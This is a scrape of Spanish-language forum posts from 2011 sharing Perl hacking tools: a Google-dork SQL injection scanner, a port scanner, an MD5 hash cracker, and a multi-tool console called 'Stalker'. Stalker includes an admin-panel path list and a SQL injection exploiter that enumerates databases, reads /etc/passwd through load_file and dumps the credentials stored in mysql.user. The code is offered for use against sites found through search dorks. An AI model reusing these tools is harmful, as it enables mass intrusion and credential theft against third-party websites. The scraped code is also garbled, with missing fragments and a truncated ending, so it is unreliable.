|
502
|
Programación / Scripting / [Perl] Search in google for scan SQLI
|
en: 7 Octubre 2011, 15:57 pm
|
Un simple scanner de SQLI para usar en google #!usr/bin/perl #Search Google for scan SQLI #(C) Doddy Hackman 2011 use LWP::UserAgent; use HTML::LinkExtor; my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages); print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) { if ($link=~/(.*)=/ig) { my $web = $1; sql($web."="); }} print "\n\n[+] Finish\n"; copyright(); <stdin>; sub google { my($a,$b) = @_; for ($pages=10;$pages<=$b;$pages=$pages+10) { $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages"); my @links = get_links($code); for my $l(@links) { if ($l =~/webcache.googleusercontent.com/) { } } } for(@url) { if ($_ =~/cache:(.*?):(.*?)\+/) { } } my @founds = repes(@founds); } sub sql { my ($pass1,$pass2) = ("+","--"); $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2); if ($code1=~/The used SELECT statements have a different number of columns/ig) { print "[+] SQLI : $page\a\n"; }} sub get_links { $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]); sub agarrar { my ($a,%b) = @_; } } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } } sub head { print "\n\n-- == Search Google == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } sub toma { return $nave->get($_[0])->content; } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } #Thanks to explorer (PerlEnEspañol) # ¿ The End ?
|
|
|
503
|
Programación / Scripting / [Perl] Scan Port By Doddy H
|
en: 7 Octubre 2011, 15:56 pm
|
HOla a todos aca les traigo un simple scanner de puertos hecho en perl #!usr/bin/perl #Scan Port #(C) Doddy Hackman 2011 #Creditos use IO::Socket; head(); unless($ARGV[0]) { print "\n\n[sintax] : ".$0." <ip> \n\n"; } else { scan($ARGV[0]); } copyright(); sub scan { my %ports = ("21"=>"ftp", "22"=>"ssh", "25"=>"smtp", "80"=>"http", "110"=>"pop3", "3306"=>"mysql" ); print "\n[+] Scanning $_[0]\n\n\n"; for my $port(keys %ports) { if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) { print "[Port] : ".$port." [Service] : ".$ports{$port}."\n"; } } } sub head { print "\n\n-- == Scan Port == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; }
Ejemplo de uso
|
|
|
504
|
Programación / Scripting / [Perl] Search MD5
|
en: 7 Octubre 2011, 15:56 pm
|
Hola a todos HOy acabo de hacer un crackeador de hash md5 con salto o sin el En esta version es con ventanas usandos tk #Search MD5 #Version : Tk #Author : Doddy Hackman use Tk; use Digest::MD5; use Tk::FileSelect; use Tk::ROText; if ($^O eq 'MSWin32') { use Win32::Console; Win32::Console::Free(); } my $w = MainWindow->new(-background=>"black"); $w->title("Search MD5"); $w->geometry("500x200+20+20"); $w->resizable(0,0); $w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack(); $w->Label(-text =>"Hash",-background =>"black",-foreground =>"green")->place(-x =>40, -y => 55); my $hash = $w->Entry(-text =>"30d554c3665c8f204622b2003c77d994",-background =>"black",-foreground =>"green")->place(-x =>90, -y => 55); $w->Label(-text =>"Salt",-background =>"black",-foreground =>"green")->place(-x =>260, -y => 55); my $salt = $w->Entry(-text =>"X",-background =>"black",-foreground =>"green")->place(-x =>290, -y => 55); $w->Label(-text =>"Wordlist",-background =>"black",-foreground =>"green")->place(-x =>40, -y => 100); my $o = $w->Entry(-textvariable =>\$file,-background =>"black",-foreground =>"green")->place(-x =>90, -y => 100); $w->Button(-text =>"Browse",-background =>"black",-foreground =>"red",-activebackground =>"red",-command =>\&oper)->place(-x =>230, -y => 100); $w->Button(-text =>"Crack!",-foreground =>"green",-background =>"black",-command =>\&crack,-activebackground =>"green")->place(-x =>180, -y => 160); $w->Button(-text =>"About",-foreground =>"green",-background =>"black",-command =>\&about,-activebackground =>"green")->place(-x =>240, -y => 160); $w->Button(-text =>"Exit",-foreground =>"green",-background =>"black",-command =>[$w =>'destroy'],-activebackground =>"green")->place(-x =>300, -y => 160); sub oper{ $w->update; $browse = $w->FileSelect(-directory => "/"); my $file = $browse->Show; $o->configure (-text =>$file); } sub about { my $venta = MainWindow->new(-background=>"black"); $venta->geometry("300x180+20+20"); $venta->title("About"); $venta->resizable(0,0); $venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack(); $venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack() } sub crack { my $hash = $hash->get; my $salt = $salt->get; my $wordlist = $o->get; my $console = MainWindow->new(-background=>"black"); $console->title("Status"); $console->resizable(0,0); $console->geometry("400x320+20+20"); $console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack(); my $box = $console->ROText(-background =>"black",-foreground =>"green",-width => 45,-height => 15)->place(-x =>40,-y=>50); $console->Button(-text =>"Exit",-background =>"black",-foreground =>"green",-activebackground =>"green",-command => [$console => 'destroy'],-width =>"20")->place(-x =>130, -y => 280); if ($salt eq "X") { $salt = "";} unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;} $box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n"); @words = <word>; for my $pass(@words) { $console->update; $box->insert('end',"[+] Trying with $pass\n"); $digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest; if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last ;} }} else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;} unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}} MainLoop;
|
|
|
505
|
Programación / Scripting / [Perl] Stalker By Doddy H
|
en: 7 Octubre 2011, 15:56 pm
|
Bueno aca les traigo un programa que eh estado haciendo esta ultima semana Se llama stalker , sirve como consola en caso de que cmd.exe no este disponible y tiene las siguiente funciones - Mostrar IP de servidor especifico
- Capturar todos los links de una pagina
- Recibir procesos de nuestra maquina
- Cerrar el proceso que nos moleste
- Conectar a un servidor y mostrar respuesta
- Capturar metodos HTTP de un servidor web
- Verificar listado de directorios en una pagina
- Codificacion y decodificacion de hex/ascii/base64
- Escanear puertos de una IP
- Buscar panel de administracion
- Crackear hash md5 mediante webs
- Buscar en google paginas vulnerables a SQLI
- Cliente FTP
- Navegador por nuestros archivos y directorios
- Y ejecutar comandos
#!usr/bin/perl #Project STALKER (C) Doddy Hackman 2011 # #ppm install http://www.bribes.org/perl/ppm/DBI.ppd #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd # #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm # use IO::Socket; use HTML::LinkExtor; use LWP::UserAgent; use Win32::Process; use Net::FTP; use Cwd; use URI ::Split qw(uri_split ); use MIME::Base64; use DBI; use Color::Output; Color::Output::Init @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); unless (-d "/logs/webs") { } my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); getinfo(); $SIG{INT} = \&next; while(1) { cprint "\x037"; #13 menujo(); cprint "\x030"; } sub getinfo { $so = $^O; $login = Win32::LoginName(); $domain = Win32::DomainName(); cprint "\x0313"; #13 print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n"; cprint "\x030"; } sub menujo { chomp (my $cmd = <stdin>); if ($cmd=~/getinfo/ig) { getinfo(); } elsif ($cmd =~/getip (.*)/) { my $te = $1; if ($te eq "" or $te eq " ") { print "\n[+] sintax : getip <host>\n"; } print "\n[IP] : ".getip ($1)."\n"; } elsif ($cmd =~/getlink (.*)/) { print "[+] Extracting links in the page\n\n\n"; $code = toma($1); my @re = get_links($code); for my $url(@re) { } print "\n\n[+] Finish\n"; } elsif ($cmd=~/help/) { helpme(); } elsif ($cmd=~/getprocess/) { my %re = getprocess(); ($proceso,$pid) = ($t=~/(.*):(.*)/ig); print "[+] Proceso : ".$data."\n"; print "[+] PID : ".$re{$data}."\n\n"; } } elsif ($cmd=~/killprocess (.*) (.*)/) { if (killprocess($1,$2)) { print "[+] Process $1 closed"; } } elsif ($cmd=~/conec (.*) (.*) (.*)/) { print conectar ($1,$2,$3); } elsif ($cmd=~/allow (.*)/) { $re = conectar($1,"80","GET / HTTP/1.0\r\n"); if ($re=~/Allow:(.*)/ig) { print "[+] Metodos : ".$1."\n"; }} elsif ($cmd=~/paths (.*)/) { scanpaths($1); } elsif ($cmd=~/encodehex (.*)/) { print "\n\n[+] ".hex_en ($1)."\n\n"; } elsif ($cmd=~/decodehex (.*)/) { print "\n\n[+] ".hex_de ($1)."\n\n"; } elsif ($cmd=~/download (.*) (.*)/) { my $file,$name = $1,$2; if (download($1,$2)) { print "[+] File downloaded\n"; } } elsif ($cmd=~/encodeascii (.*)/) { print "\n\n[+] ".ascii ($1)."\n\n"; } elsif ($cmd=~/decodeascii (.*)/) { print "\n\n[+] ".ascii_de ($1)."\n\n"; } elsif ($cmd=~/encodebase (.*)/) { print "\n\n[+] ".base ($1)."\n\n"; } elsif ($cmd=~/decodebase (.*)/) { print "\n\n[+] ".base_de ($1)."\n\n"; } elsif ($cmd=~/aboutme/) { aboutme(); } elsif ($cmd=~/scanport (.*)/) { scanport($1); } elsif ($cmd=~/panel (.*)/) { scanpanel($1); } elsif ($cmd=~/scangoogle/) { chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages); print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) { if ($link=~/(.*)=/ig) { my $web = $1; sql($web."="); }} print "\n\n[+] Finish\n"; } elsif ($cmd=~/getpass (.*)/) { crackit($1); } elsif ($cmd=~/ftp (.*) (.*) (.*)/) { ftp($1,$2,$3); } elsif ($cmd=~/navegator/) { nave: chomp(my $rta = <stdin>); if ($rta=~/list/) { my @files = coleccionar(getcwd()); for(@files) { if (-f $_) { print "[File] : ".$_."\n"; } else { print "[Directory] : ".$_."\n"; }}} if ($rta=~/cd (.*)/) { my $dir = $1; print "\n[+] Directory changed\n"; } else { }} if ($rta=~/del (.*)/) { my $file = getcwd()."/".$1; if (-f $file) { print "\n[+] File Deleted\n"; } else { } } else { print "\n[+] Directory Deleted\n"; } else { }}} if ($rta=~/rename (.*) (.*)/) { if (rename(getcwd ()."/".$1,getcwd ()."/".$2)) { print "\n[+] File Changed\n"; } else { }} my $file = $1; #system(getcwd()."/".$file); } if ($rta=~/help/) { print "\nCommands : help cd list del rename open exit\n\n"; } next; } } elsif ($cmd=~/kobra (.*)/) { my $url = $1; scansqli($url,"--"); } elsif ($cmd=~/mysql (.*) (.*) (.*)/) { enter($1,$2,$3); } copyright(); <stdin>; } else { } #print "\n\n"; } sub scansqli { print "[Status] : Scanning.....\n"; $pass = &bypass($_[1]); my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; if ($_[0]=~/hackman/ig) { savefile($save.".txt","\n[Target Confirmed] : $_[0]\n"); &menu_options($_[0],$pass,$save); } my ($gen,$save,$control) = &length($_[0],$_[1]); if ($control eq 1) { print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save); } else { print "[Status] : Length columns not found\n\n"; menujo(); } } my $rows = "0"; my $asc; my $page = $_[0]; ($pass1,$pass2) = &bypass($_[1]); $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2; $code = toma($inyection); if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) { my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2); my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2); unless ($testar1 eq $testar2) { my $patha = $1; $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")"; $total = "1"; for my $rows(2..200) { $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; $total.= ",".$rows; $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc; $test = toma($injection); if ($test=~/RATSXPDOWN/) { @number = $test =~m{RATSXPDOWN (\d+)RATSXPDOWN }g ; $control = 1; my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; savefile($save.".txt","\n[Target confirmed] : $page"); savefile($save.".txt","[Bypass] : $_[1]\n"); savefile($save.".txt","[Limit] : The site has $rows columns"); savefile($save.".txt","[Data] : The number @number print data"); if ($patha) { savefile($save.".txt","[Full Path Discloure] : $patha"); } $total=~s/$number[0]/hackman /; savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total); return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); }}}}} sub details { my ($page,$bypass,$save) = @_; ($pass1,$pass2) = &bypass($bypass); savefile($save.".txt","\n"); if ($page=~/(.*)hackman(.*)/ig) { print "\n\n[+] Searching information..\n\n"; my ($start,$end) = ($1,$2); $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2; $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2; $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ($test2=~/ERTOR854/ig) { savefile($save.".txt","[mysql.user] : ON"); print "[mysql.user] : ON\n"; } else { print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF"); } if ($test1=~/ERTOR854/ig) { print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON"); } else { print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF"); } if ($test3=~/ERTOR854/ig) { print "[+] load_file permite ver los archivos\n"; savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2); } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start.$concat.$end.$pass2; $code = toma($injection); if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) { print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n"); } else { print "\n[-] Not found any data\n"; }}} sub menu_options { my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]); my $save = $auth; print "\n/logs/webs/$save>"; chomp (my $rta = <stdin>); if ($rta=~/help/) { commands : details tables columns dbs othertable othercolumn mysqluser dumper logs exit ); } if ($rta =~/tables/) { schematables($_[0],$_[1],$save); &reload; } elsif ($rta =~/columns (.*)/) { my $tabla = $1; schemacolumns($_[0],$_[1],$save,$tabla); &reload; } elsif ($rta =~/dbs/) { &schemadb($_[0],$_[1],$save); &reload; } elsif ($rta =~/othertable (.*)/) { my $data = $1; &schematablesdb($_[0],$_[1],$data,$save); &reload; } elsif ($rta =~/othercolumn (.*) (.*)/){ my ($db,$table) = ($1,$2); &schemacolumnsdb($_[0],$_[1],$db,$table,$save); &reload; } elsif ($rta =~/mysqluser/) { &mysqluser($_[0],$_[1],$save); &reload; } elsif ($rta=~/logs/) { $t = "logs/webs/$save.txt"; &reload; } next; } elsif ($rta=~/dumper (.*) (.*) (.*)/) { my ($tabla,$col1,$col2) = ($1,$2,$3); &dump($_[0],$col1,$col2,$tabla,$_[1],$save); &reload; } elsif ($rta =~/details/) { &details($_[0],$_[1],$save); &reload; } else { &reload; } } sub schematables { $real = "1"; my ($page,$bypass,$save) = @_; savefile($save.".txt","\n"); my $page1 = $page; ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","[DB] : default"); print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $resto = $1; $total = $resto - 17; print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n"); savefile($save.".txt","[+] Tables Length : $total\n"); my $limit = $1; for my $limit(17..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; } } sub reload { &menu_options($_[0]); } sub schemacolumns { my ($page,$bypass,$save,$table) = @_; my $page3 = $page; my $page4 = $page; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($bypass); print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default"); savefile($save.".txt","[Table] : $table\n"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemadb { my ($page,$bypass,$save) = @_; my $page1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass); $page=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata"); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $limita = $1; print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n"); $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),schema_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit(0..$limita) { $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $control = $1; if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") { print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control"); $real++; } } } } else { print "[-] information_schema = ERROR\n"; } } sub schematablesdb { my $page = $_[0]; my $db = $_[2]; my $page1 = $page; savefile($_[3].".txt","\n"); print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]); savefile($_[3].".txt","[DB] : $db"); $page =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),table_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n"; if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n"); my $limit = $1; $real = "1"; for my $lim(0..$limit) { $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2); #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n"; if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { my $table = $1; savefile($_[3].".txt","[Table $real Found : $table ]"); print "[Table $real Found : $table ]\n"; $real++; }} } else { print "\n[-] information_schema = ERROR\n"; }} sub schemacolumnsdb { my ($page,$bypass,$db,$table,$save) = @_; my $page3 = $page; my $page4 = $page; print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n"); ($pass1,$pass2) = &bypass($_[1]); savefile($save.".txt","\n[DB] : $db"); savefile($save.".txt","[Table] : $table"); $page3=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2); if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n"); my $si = $1; $page4=~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),column_name ,char (82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1"; for my $limit2(0..$si) { $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2); if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1"); $real++; } } } else { print "\n[-] information_schema = ERROR\n"; } } sub mysqluser { my ($page,$bypass,$save) = @_; my $cop = $page; my $cop1 = $page; savefile($save.".txt","\n"); print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass); $page =~s/hackman /concat (char (82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2); if ($code=~/RATSXPDOWN/ig){ $cop1 =~s/hackman /unhex (hex(concat (char (82,65,84,83,88,80,68,79,87,78,49),Count (*),char (82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2); if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { print "\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n"); for my $limit(0..$1) { $cop =~s/hackman /unhex (hex(concat (0x524154535850444f574e ,Host ,0x524154535850444f574e ,User ,0x524154535850444f574e ,Password ,0x524154535850444f574e )))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2); if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) { print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3"); } else { &reload; } } } } else { print "\n[-] mysql.user = ERROR\n\n"; } } savefile($_[5].".txt","\n"); my $page = $_[0]; ($pass1,$pass2) = &bypass($_[4]); if ($page=~/(.*)hackman(.*)/){ my $start = $1; my $end = $2; print "\n\n[+] Extracting values...\n\n"; $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))"; $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2); $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))"; if ($val_code=~/ERTOR854(.*)ERTOR854/ig) { $tota = $1; print "[+] Table : 